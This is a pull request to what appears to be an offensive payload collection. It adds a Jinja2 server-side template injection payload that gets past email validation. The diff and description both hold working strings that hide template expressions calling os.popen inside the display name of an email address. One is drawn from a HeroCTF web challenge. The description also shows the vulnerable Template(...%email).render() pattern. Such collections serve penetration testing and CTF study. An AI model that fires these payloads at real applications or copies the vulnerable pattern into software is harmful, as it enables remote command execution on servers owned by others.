### PR TITLE
feat(SSTI): add email-validator bypass in python3

### DIFF
--- a/Server Side Template Injection/Python.md
+++ b/Server Side Template Injection/Python.md
@@ -260,6 +260,11 @@ In another GET parameter include a variable named "input" that contains the comm
 request.__class__
 request["__class__"]
 ```
+Bypassing email-validator
+
+```python
+"Smith+{{lipsum.__globals__.os.popen('/file').read()}}"+<smith@example.com>
+```
 
 Bypassing `_`
 


### PR DESCRIPTION
Added new email-validator bypass from https://github.com/HeroCTF/HeroCTF_v6/tree/main/Web/Jinjatic
### Vulnerable email template like: 
```python
return Template(email_template%(email)).render()
```
![image](https://github.com/user-attachments/assets/d64bb818-0475-4a26-973b-06ef319e4cde)

### Example writeup:
```python
"Worty test+{{lipsum.__globals__.os.popen('/getflag').read()}}@heroctf.fr" <worty@heroctf.fr>
```
